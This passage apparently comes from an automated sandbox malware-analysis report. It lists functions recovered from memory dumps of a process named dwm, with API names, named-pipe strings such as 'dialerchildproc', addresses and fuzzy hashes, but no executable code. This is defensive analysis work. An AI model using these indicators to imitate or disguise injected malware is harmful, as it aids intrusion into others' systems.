                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002BAAEE00A6B,?,?,?,000002BAAEE0045C,?,?,?,000002BAAEDFC84F), ref: 000002BAAEDFCF54
                                                          • Part of subcall function 000002BAAEDFD744: HeapFree.KERNEL32 ref: 000002BAAEDFD75A
                                                          • Part of subcall function 000002BAAEDFD744: GetLastError.KERNEL32 ref: 000002BAAEDFD764
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002BAAEE00A6B,?,?,?,000002BAAEE0045C,?,?,?,000002BAAEDFC84F), ref: 000002BAAEDFCF65
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002BAAEE00A6B,?,?,?,000002BAAEE0045C,?,?,?,000002BAAEDFC84F), ref: 000002BAAEDFCF76
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorLast$Heap$AllocFree
                                                        • String ID:
                                                        • API String ID: 570795689-0
                                                        • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                        • Instruction ID: 01e7d99de580d2bb8e957ca4e65fd31d41413e7a64f6b3c6e05d97cd56586373
                                                        • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                        • Instruction Fuzzy Hash: E341802070134441FA78E731955D36D73B29F957B4F380728A8BE4AAEADF28C451D237
                                                        Function 000002BAAEDF2244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                        • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                        • API String ID: 2171963597-1373409510
                                                        • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                        • Instruction ID: e475c542c3fc8f5e9c1ea63ce18cd68e6815f715107f2c5cb0e10c38f46ac8a1
                                                        • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                        • Instruction Fuzzy Hash: E0213872654B4193EB60CB25E44835A77B0F789BA4F604225EA9942EA8CF3CC149CB12
                                                        Function 000002BAAEDFA544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 849930591-393685449
                                                        • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                        • Instruction ID: 28fd30d8de1863f4827a3e47e8af121b74ce8415f8b2b0d18f529f20809478b0
                                                        • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                        • Instruction Fuzzy Hash: A5E1D472A04B808AEB20DF65D48839D77B0F785B98F604116EECD5BB99CF34C191CB22
                                                        Function 000002BAAEDC9944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183027949.000002BAAEDC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAEDC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedc0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 849930591-393685449
                                                        • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                        • Instruction ID: 0e1fcc14573ae700ecef04849d54fe56b69193aba6d354a2f4fcc66dff62847a
                                                        • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                        • Instruction Fuzzy Hash: EFE19972604B808AEB629F75D48839D77B0F795BD8F201116EECD97B9ACB34D091C722
                                                        Function 000002BAAEDFF394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeLibraryProc
                                                        • String ID: api-ms-$ext-ms-
                                                        • API String ID: 3013587201-537541572
                                                        • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                        • Instruction ID: 4d6808facc4de05c8c68c19d0f6b22d34854e2ef5ce9be60218a6eaeb3d075bd
                                                        • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                        • Instruction Fuzzy Hash: 9A41D322311B0095FF76CB26A80879533B5FB49BE0F2941299D8E87B88EF3CC545C326
                                                        Function 000002BAAEDF104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                        • String ID: d
                                                        • API String ID: 3743429067-2564639436
                                                        • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                        • Instruction ID: 92749279b72a6e3b891d05313cb35e5094250e8cd656c3bd39e6c66893a601a7
                                                        • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                        • Instruction Fuzzy Hash: 6A416F33214B84D6E7A0CF21E44879E77B1F389B98F548129DA8D0BB59DF38C989CB51
                                                        Function 000002BAAEDFD068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • FlsGetValue.KERNEL32(?,?,?,000002BAAEDFC7DE,?,?,?,?,?,?,?,?,000002BAAEDFCF9D,?,?,00000001), ref: 000002BAAEDFD087
                                                        • FlsSetValue.KERNEL32(?,?,?,000002BAAEDFC7DE,?,?,?,?,?,?,?,?,000002BAAEDFCF9D,?,?,00000001), ref: 000002BAAEDFD0A6
                                                        • FlsSetValue.KERNEL32(?,?,?,000002BAAEDFC7DE,?,?,?,?,?,?,?,?,000002BAAEDFCF9D,?,?,00000001), ref: 000002BAAEDFD0CE
                                                        • FlsSetValue.KERNEL32(?,?,?,000002BAAEDFC7DE,?,?,?,?,?,?,?,?,000002BAAEDFCF9D,?,?,00000001), ref: 000002BAAEDFD0DF
                                                        • FlsSetValue.KERNEL32(?,?,?,000002BAAEDFC7DE,?,?,?,?,?,?,?,?,000002BAAEDFCF9D,?,?,00000001), ref: 000002BAAEDFD0F0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Value
                                                        • String ID: 1%$Y%
                                                        • API String ID: 3702945584-1395475152
                                                        • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                        • Instruction ID: 87ce3cd2b22bdf32f6b5cf4ec293e9ba429de85969ccf05228afd4229d824717
                                                        • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                        • Instruction Fuzzy Hash: 1E11942070438451FA68E736A95D36973719B557F8F384724A8BE07BEADF28C442D223
                                                        Function 000002BAAEDF7510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID:
                                                        • API String ID: 190073905-0
                                                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction ID: 1318caf13de8b04a23ce044cac0dd516da927a54ba5e8a2999e94ee861b58642
                                                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction Fuzzy Hash: A68108207303429AFBA4DB65A84D3D937B1AB85780F744425E9CC47B96EB7AC845C733
                                                        Function 000002BAAEDF9DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                        • String ID: api-ms-
                                                        • API String ID: 2559590344-2084034818
                                                        • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                        • Instruction ID: 06ae3486feda111ada41b0278c961c7cd4cf5308fd5a5969803fd1c8fc0baebe
                                                        • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                        • Instruction Fuzzy Hash: CA31C621713B40E1EF61DB82A81875933B4F748BA0F7985259DAE0B794DF39C585C322
                                                        Function 000002BAAEE03DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                        • String ID: CONOUT$
                                                        • API String ID: 3230265001-3130406586
                                                        • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                        • Instruction ID: db8a81eff005282016f07d83c28d67647e7a48e49bc93c9820ba17fe59873458
                                                        • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                        • Instruction Fuzzy Hash: 55116A21350B8196E7B08B52E848319B7B0F798FE4F244224EAAE87FA4CF78C955C751
                                                        Function 000002BAAEDF2F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID: dialer
                                                        • API String ID: 756756679-3528709123
                                                        • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                        • Instruction ID: 737f97488920e4ae6f5cef42b43d3862bc3f78a164ca931e418828c5db40b557
                                                        • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                        • Instruction Fuzzy Hash: 2131B022711B5292EA64DF1BE94876A77B0FB45B80F184035AFCC47B56EF38C4A1C321
                                                        Function 000002BAAEDFCFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorLast
                                                        • String ID:
                                                        • API String ID: 2506987500-0
                                                        • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                        • Instruction ID: 4acdcfdcf3885ad74f3085b933b891c07e4902976b71fe125519cc4dffcd31bd
                                                        • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                        • Instruction Fuzzy Hash: 06115E2074138082FA64E732A55D3297372AF957F8F344724A8BE47BEADF68C451D622
                                                        Function 000002BAAEDF199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                        • String ID:
                                                        • API String ID: 517849248-0
                                                        • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                        • Instruction ID: 90be1499755b067608b3a1df86aeecd890f9a03b3d1fb6898e7e9a42c7c4878a
                                                        • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                        • Instruction Fuzzy Hash: 8F015B21300A4196EA64DB52A45C35973B1FB88BC4F684035DE8D43B55DF3CC54AC751
                                                        Function 000002BAAEDF36C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                        • String ID:
                                                        • API String ID: 449555515-0
                                                        • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                        • Instruction ID: d37d57f8f0fef868811603db5eefe68ef8ce8799f104095edb307b5e953f2a0a
                                                        • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                        • Instruction Fuzzy Hash: E3011765751B41D2FF749B25E81C31973B0BB59B86F244428DA8D07B65EF3DC148C722
                                                        Function 000002BAAEDF8FE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 2395640692-629598281
                                                        • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                        • Instruction ID: ed7044a59e46063c6cedcc0fa70a4cb5f9e38caaa5c3ad2d4ddba7fa5267c18f
                                                        • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                        • Instruction Fuzzy Hash: AA51BD32B017009AEB64CF65E84CB5937B6F344B98F248534EA8F47788DB35C981CB22
                                                        Function 000002BAAEDF1A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: FinalHandleNamePathlstrlen
                                                        • String ID: \\?\
                                                        • API String ID: 2719912262-4282027825
                                                        • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                        • Instruction ID: eede53fd5bf1c617aa0365c69d83f6964c9c5141aef9ea52c6707d0781c4fd97
                                                        • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                        • Instruction Fuzzy Hash: 85F0443230464292E7709B21F8987597770F758B88FA44034DA8D8AD55DF3CC64DCB11
                                                        Function 000002BAAEDF3044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CombinePath
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3422762182-91387939
                                                        • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                        • Instruction ID: 677d836a365569318be48d7dc26c03b707c4fd806aa4b64e320e2f65dfdf5f96
                                                        • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                        • Instruction Fuzzy Hash: 32F08220304B8192EAA48F53B91C2197370AB88FD0F248031EE8A47F18DF3CC445C7A1
                                                        Function 000002BAAEDFBC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: CorExitProcess$mscoree.dll
                                                        • API String ID: 4061214504-1276376045
                                                        • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                        • Instruction ID: ffa703ce45f9f47f93a2fd77227258ce1f52bea2fd7e0728689e18b643c996d3
                                                        • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                        • Instruction Fuzzy Hash: B3F0966135170591EB708B24F84C35A7330EB847A1F640229CAEE46AE4CF3DC544C371
                                                        Function 000002BAAEDF5710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: 0c7f3a11ae4e5ff47235e902b7b6ce7055ed727b420134bb2449cab27e882fd8
                                                        • Instruction ID: 2e5659b599159111f5a82bbfe3fa8239b5a03c6f8e81b61fa4bdca3449316732
                                                        • Opcode Fuzzy Hash: 0c7f3a11ae4e5ff47235e902b7b6ce7055ed727b420134bb2449cab27e882fd8
                                                        • Instruction Fuzzy Hash: A0619636519B84C6EB60DB15F54831ABBB0F388794F201516EACE47BA8DB7CC954CF12
                                                        Function 000002BAAEE04104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction ID: af7a10fbcdd35d25a0eedde17d056fd84300e72477245582d1813680f258cf9a
                                                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction Fuzzy Hash: 92115122AD0A5131F7F45568E65E36533F16B683B8F380A28A9F606ED68B24C941C232
                                                        Function 000002BAAEDD3504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183027949.000002BAAEDC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAEDC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedc0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction ID: 8a0b107e24b1548139f2e99b5c7c3efda6f15ee66b1dc4c44c5584c7e3cbcf73
                                                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction Fuzzy Hash: A611CA72612E5152FA64152CE4CD36933A06B58374FB8473AA9FEC63D6CB24C841C232
                                                        Function 000002BAAEDCF040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183027949.000002BAAEDC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAEDC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedc0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                        • API String ID: 3215553584-4202648911
                                                        • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                        • Instruction ID: 8275968d12326c96308ad6d1f800c51956b246ff52fd5645692c1f8a32ad9f62
                                                        • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                        • Instruction Fuzzy Hash: 29619E2260064042FA679B79E54C3AA7BF1E7C17C8F705415DADE477E4DB34C946C222
                                                        Function 000002BAAEDFAA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CallEncodePointerTranslator
                                                        • String ID: MOC$RCC
                                                        • API String ID: 3544855599-2084237596
                                                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction ID: 17bb476466e3ff4f04a85ec908232aadd8a646a24b2af8f35efcc5f76b9c8b99
                                                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction Fuzzy Hash: 3B617937A00B848AEB20DFA5D48479D77B0F748B88F244216EF8E1BB98DB38D595C711
                                                        Function 000002BAAEDFAD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                        • String ID: csm$csm
                                                        • API String ID: 3896166516-3733052814
                                                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction ID: e59089bba677d222a3ff6305b6a95a49dbcb197b1d356d863ec01ed1e03d3b10
                                                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction Fuzzy Hash: C4519F762043808AEB74CF25959835D77B0F794B89F289216EADD8FBD5CB38D490CB12
                                                        Function 000002BAAEDCA178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183027949.000002BAAEDC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAEDC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedc0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                        • String ID: csm$csm
                                                        • API String ID: 3896166516-3733052814
                                                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction ID: 23aca5113cd6646f5191f7d0f29d6b2863c202459108ff2c2bc3649bdf9ec196
                                                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction Fuzzy Hash: FD516C32100380CAEB768FB5955835977B0F395BD4F289216EADE8BBD5CB38D491CB12
                                                        Function 000002BAAEDC8405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183027949.000002BAAEDC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAEDC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedc0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritable__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 3242871069-629598281
                                                        • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction ID: 33ee84f3d2e35e2eb260c96c6a9f41b19c8e49cab8daa237f789fbd62d683701
